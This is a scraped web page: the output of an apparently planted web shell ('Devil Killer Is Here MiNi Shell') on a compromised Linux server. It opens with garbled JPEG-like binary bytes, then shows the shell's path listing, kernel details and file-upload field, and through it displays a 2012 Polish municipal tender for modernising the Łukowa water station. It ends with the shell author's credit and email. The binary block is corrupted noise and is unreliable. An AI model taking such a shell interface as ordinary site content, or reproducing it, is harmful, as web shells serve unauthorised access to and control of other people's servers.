JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120411/113124-N-2012.html

<p class="kh_header"><b>Łukowa: Przebudowa i modernizacja stacji wodociągowej 
w Łukowej.</b><br>
<b>Numer ogłoszenia: 113124 - 2012; data zamieszczenia: 11.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łukowa , Łukowa 262, 23-412 Łukowa, woj. lubelskie, tel. 084 6874002, faks 084 6874045.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa i modernizacja stacji wodociągowej 
w Łukowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Zamówienie polega na przebudowie i modernizacji stacji wodociągowej w miejscowości Łukowa celem zapewnienia ciągłości dostaw wody i obejmuje:

1)  Roboty budowlane wewnętrzne: roboty demontażowe, usunięcie stolarki drzwiowej, roboty wyburzeniowe, rozbiórka wewnętrznych ścianek działowych, rozkucie żelbetowych podstaw pod zdemontowane pompy i hydrofory, wykucie w ścianie zewnętrznej otworu na drzwi wejściowe, 
z wykonaniem nadproża, rozkucie istniejącej posadzki w celu wykonania fundamentu pod wewnętrzne ścianki działowe, podniesienie posadzki w części budynku, celem wyrównania poziomów, wywiezienie gruzu i ziemi z terenu stacji wodociągowej w miejsce wskazane przez Inwestora, wykonanie nowej posadzki w części budynku oraz fundamentu pod ścianki działowe, wykonanie izolacji poziomych, wykonanie nowych ścianek działowych, ocieplenie styropianem ściany oddzielającej POM. Socjalne od pozostałych pomieszczeń stacji, montaż wewnętrznej stolarki drzwiowej, montaż drzwi zewnętrznych stalowych ocieplanych, wymiana 4 szt. okien drewnianych na PCV, wykonanie prac wykończeniowych, tynki wewnętrzne, płytki na ścianach i posadzkach, malowanie.

2) Roboty na zewnątrz budynku, na terenie stacji: wybranie w ziemi koryta pod nowy wjazd na teren stacji, wykonanie warstw podbudowy pod wjazd , rozebranie istniejącego krawężnika, podniesienie krawężnika pod kostkę, uzupełnienie krawężników na nowych odcinkach z wykonaniem ław fundamentowych, ułożenie na całej powierzchni placu kostki brukowej betonowej, montaż nowej bramy wjazdowej w istniejącym ogrodzeniu, skucie częściowe istniejących schodów zewnętrznych betonowych, przebudowa schodów zewnętrznych.

3)  Roboty instalacyjne, technologia; zbiorniki wyrównawcze: wymiana rurociągów technologicznych fi 110 mm -12 mb, wymiana komór włazowych - 2 szt, rurociągi doprowadzające i odprowadzające: roboty ziemne - 83,812 m3, wymiana rurociągów PCV - fi 110 mm -136,5 mb, technologia stacji wodociągowej: roboty demontażowe urządzeń i rurociągów,wykonanie fundamentu pod zestaw hydroforowy, wymiana pomp i hydroforów na zestaw hydroforowy MDF4-CR45.2/7,5 kW, montaż elektronicznego czujnika przepływu MAG 5100W,montaż chloratora z pompka i czujnikiem poziomu, instalacja wod - kan i CW stacji wodociągowej: wykonanie instalacji kanalizacyjnej z PCV fi 50 -110 mm, wykonanie instalacji wodociągowej z rur polietylenowych fi 20 - 25 mm, montaż armatury i biały montaż, montaż elektrycznego podgrzewacza wody KOSPEL EPO 6 kW, instalacja grzewcza stacji wodociągowej: montaż grzejników elektrycznych 1.0 - 2.0 kW - szt.8, montaż promiennika ATLANTIC 1500, montaż osuszacza powietrza FRAL - FND 33, sieci zewnętrzne na terenie stacji: rurociągi podchlorynu sodu:roboty ziemne-18,934 m3,studnia fi 1200 mm gł. 2,5 m - szt 1,rurociągi PE fi 20 mm - 6,7 m, nasada rurowa fi 160/25 mm - szt. 1,kanalizacja z pomieszczenia chloratora: roboty ziemne - 8,664 m3, studzienka Vawin X Stream fi 600 mm -szt.1, rurociągi PCV fi 50 mm -14,0 mb, oczomyjka - szt. 1., kanalizacja sanitarna S6 -1: roboty ziemne - 560,947 m3, rury PCV typ N fi 200 mm -142,0 mb, studzienka Vawin fi 315 mm - szt. 6.

4)  Roboty elektryczne: demontaż całkowity istniejącej instalacji elektrycznej wewnętrznej, za wyjątkiem kabli ziemnych przedlicznikowych, zalicznikowych i sterowniczych, które zostaną ponownie wykorzystane, demontażowi podlegają rozdzielnice żeliwne łącznie z pomiarową, cztery zestawy ZPGT 15 kW, bateria kondensatorów, instalacje siłowe, instalacje oświetleniowe i gniazdek 1 -f, oraz obwody sterownicze,  demontaże należy przeprowadzać sukcesywnie z równoczesnym montażem nowych urządzeń i instalacji, celem zapewnienia ciągłości pracy stacji wodociągowej, rozpoczęcie prac demontażowych należy poprzedzić szczegółowym harmonogramem prac, sporządzonym przez wszystkich podwykonawców i uzgodnionym przez użytkownika obiektu: opracowany harmonogram powinien uwzględnić konieczność utrzymania dostaw wody dla odbiorców komunalnych, przy ograniczeniu do niezbędnego minimum okresów jej braku, istniejące kable NN przedlicznikowe 2 x YAKY 4 x 120 mm2 zakończyć w nowym złączu kablowo-pomiarowym 2KP zlokalizowanym na zewnątrz budynku SUW, na wysokości ich dotychczasowego wprowadzenia do budynku SUW, złącze wykonać ze skrzynek z tworzywa termoutwardzalnego o stopniu ochrony minimum IP44 / fundament, skrzynka kablowa ZK3a z wyłącznikami bezpiecznikowymi, skrzynka z listwą Ska, bezpiecznikami obwodów napięciowych, licznikiem oraz skrzynka z przekładnikami prądowymi, ze złącza ZKP wykonać istniejącym zalicznikowym kablem YAKY 4 x 35 mm2 podłączenie zasilania do SZR istniejącego agregatu prądotwórczego /agregat z fabrycznym układem samorozruchu/, istniejący kabel odejściowy YAKY 4 x 35 mm2 wyprowadzony z układu SZR agregatu wykorzystać do podłączenia nowej rozdzielnicy zasilająco-sterowniczej RZS, nowa rozdzielnica RZS wykonana jako szafa metalowa dwudrzwiowa o stopniu ochrony min. IP44 i wymiarach 2000 x 1000 x 400 mm, wyposażona w obwody zasilania i sterowania wszystkich urządzeń i instalacji stacji wodociągowej, układ sterowania oparty na sterowniku swobodnie programowalnym i wizualizacją opartą na ekranie graficznym dotykowym,  instalacje elektryczne technologiczne wewnętrzne: siłowe, sterowania, pomiaru i sygnalizacji układu technologicznego budynku SUW,  instalacje elektryczne ogólne wewnętrzne: oświetleniowa, gniazd wtyczkowych 1 i 3-f budynku, instalacja połączeń wyrównawczych budynku SUW, instalacja odgromowa budynku SUW, instalacja pomiaru i sygnalizacji poziomu wody w zbiornikach wody SUW wraz z połączeniami kablowymi z proj. rozdzielniami technologicznymi RT, nawiązanie z proj. rozdzielni technologicznej RZS istniejącym kablem sygnalizacyjnym sterowania pompami głębinowymi S-1 i S-2 ujęcia Łukowa - Rakowiec, przebudowa instalacji wewnętrznej /układ pomiarowy oraz rozdzielnica zasilająco-sterownicza/ studni głębinowych S-1 i S-2.

5)  Studnia głębinowa;  obudowa studni :roboty ziemne związane z wykonaniem wykopu jamistego dla wykonania obudowy betonowej studni wierconej, wykonanie warstwy betonu podkładowego pod podstawę betonową obudowy, wykonanie podstawy betonowej pod obudowę studni z kręgów żelbetowych d= 1500mm, osadzeniem głowicy studziennej stalowej - połączenie z wykonanym odwiertem, dostarczenie i montaż prefabrykowanej obudowy żelbetowej z kręgów betonowych o średnicy 1500mm, wykonanie izolacji przeciwwodnej obudowy studni wykonanej z prefabrykowanych kręgów betonowych o średnicy 1500mm, wykonanie i montaż pokrywy nastudzienej obudowy, dostawa i montaż wyłazów rewizyjnych, drabinki oraz rury wywiewnej, obsypanie wykonanej obudowy ziemią wraz z wykonaniem nasypu i wyprofilowaniem skarp, dostawa i montaż pompy głębinowej o wydajności 43m3/h z pionowym odcinkiem rury ocynkowanej o średnicy 80mm i o długości 20mb z opuszczeniem do gotowego odwiertu na głębokość 20 metrów,  dostarczenie i montaż wodomierza o średnicy nominalnej 80mm - oraz wykonanie połączenia z odcinkiem przyłącza wody o długości 15mb (przyłącz opisany w punkcie nr 3), wykonanie przyłącza wody długości 15 mb: roboty ziemne liniowe pod wykonanie przyłącza wody o długości 15mb i średnicy 110mm,montaż rurociągu PE o średnicy 110mm w gotowym wykopie,wykonanie przejścia szczelnego rurociągu do wykonanej obudowy studni, wykonanie płukania rurociągu oraz próby szczelności wraz z inwentaryzacją geodezyjną powykonawczą wykonanego zakresu robót, zasypanie wykopu - doprowadzenie terenu w obszarze wykonywanych robót do stanu pierwotnego ( uporządkowanie terenu), wykonanie robót studniarskich: polega na wykonaniu nowej studni S- 3A, która zabezpieczy potrzeby użytkowników wodociągu i będzie studnią podstawową. Głębokość studni 39 m, kolumna rur osłonowych 508 mm -14 m.
6)  Roboty uzupełniające i dodatkowe:  roboty uzupełniające: dodatkowy odcinek sieci PE 110 łączący studnię S-3A z instalacją zasilającą zbiorniki wyrównawcze, nowy odcinek sieci PE DN200 pomiędzy zbiornikami wyrównawczymi a zestawem hydroforowym, nowy odcinek sieci PE DN200 łączący zestaw hydroforowy z istniejącą gminną siecią wodociągową, bloki oporowe na elementach uzbrojenia sieci wodociągowej, roboty dodatkowe: wymiana orynnowania obiektu ze zniszczonych elementów PCV na system stalowy, wymiana zniszczonych drzwi stalowych do pomieszczenia chloratora na drzwi nowe, wymiana opaski wokół budynku, dodatkowe zabezpieczenie przed suchobiegiem zestawu hydroforowego bezpośrednio na jego kolektorze, wykonanie zasilania energetycznego studni S 3A, wykonanie ściennych elementów wentylacji grawitacyjnej w części pomieszczeń, montaż wentylatora ściennego w pomieszczeniu chloratora.
	Szczegółowy opis, zakres rzeczowy przedmiotu zamówienia oraz technologia  wykonania        	opisane zostały w projekcie budowlanym oraz w przedmiarze robót i specyfikacji 	technicznej wykonania i odbioru robót.


	Roboty należy wykonywać w taki sposób aby zapewnić ciągłą dostawę wody dla mieszkańców gminy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.25.21.26-7, 45.23.31.42-6, 45.23.31.23-7, 45.33.22.00-5, 45.45.31.00-8, 45.33.20.00-3, 45.33.11.00-7, 45.11.21.00-6, 45.31.56.00-4, 45.32.23.10-3, 45.31.43.10-7, 45.31.53.00-1, 45.31.71.00-3, 45.31.73.00-5, 45.23.13.00-8, 45.11.12.00-0, 45.33.20.00-3, 45.26.22.00-3, 71.33.10.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie spełniony, jeżeli Wykonawca wykaże wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; wg wzoru stanowiącego załącznik Nr 3  do SIWZ.

( Wykonawca winien wykazać, iż należycie wykonał przynajmniej jedną przebudowę, modernizację, budowę stacji wodociągowej lub stacji uzdatniania wody  o wartości co najmniej 650 000,00 zł brutto , informacje te powinny wynikać w sposób jednoznaczny np. z  referencji, które należy dołączyć do oferty).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek ten zostanie spełniony, jeżeli Wykonawca  wykaże wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami i oświadczenia, że osoby , które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; wg wzoru stanowiącego załącznik Nr 4 do SIWZ.

( Wykonawca winien wskazać do realizacji niniejszego zamówienia osoby 
z uprawnieniami budowlanymi w specjalności: 
 - konstrukcyjno-budowlanej,
 - instalacyjnej w zakresie sieci,  instalacji i urządzeń wodociągowych i kanalizacyjnych, 
- instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych, oraz
- osobę dozoru ruchu w specjalności wiertniczej ( poszukiwanie i rozpoznawanie wód podziemnych).

 i oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawień).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Uzupełniona tabela elementów scalonych- wg wzoru stanowiącego załącznik Nr 6 do SIWZ. Zamawiający nie wymaga dołączenia do oferty wypełnionego przedmiaru. Uzupełniony przedmiar 
( kosztorys ofertowy), zgodny z dostarczoną do oferty tabelą elementów scalonych Wykonawca, którego oferta zostanie wybrana dostarczy do Zamawiającego w ciągu 3 dni od daty otrzymania pisma informującego o wyborze oferty.

2.Pełnomocnictwo do reprezentowania Wykonawcy o ile ofertę podpisuje pełnomocnik lub poświadcza         za zgodność z oryginałem kopie dokumentów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmianę dopuszcza się w przypadku wystąpienia co najmniej 	jednej z okoliczności niezależnych od stron umowy lub nieznanych stronom umowy w chwili jej 	zawierania bądź podczas prowadzenia postępowania o udzielenie zamówienia, 	uniemożliwiającymi lub utrudniającymi prowadzenie robót budowlanych, prób i sprawdzeń, 	dokonywanie odbiorów spowodowanych:
1)	Warunkami atmosferycznymi odbiegającymi od typowych np. nadmierne opady utrzymujące się ciągle przez okres powyżej 10 dni lub inne zdarzenia losowe i o charakterze siły wyższej;
2)Koniecznością usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;
3)	Zaistnieniem innych uzasadnionych okoliczności prawnych lub technicznych uniemożliwiających wykonanie umowy zgodnie z SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lukowa.bip.mbnet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łukowa, Łukowa 262, 23-412 Łukowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2012 godzina 10:00, miejsce: Urząd Gminy Łukowa, Łukowa 262, 23-412 Łukowa w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt znajduje się na zatwierdzonej liście do dofinansowania w ramach działania 321 Podstawowe usługi dla gospodarki i ludności wiejskiej,oczekuje na dostępność środków finansowych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com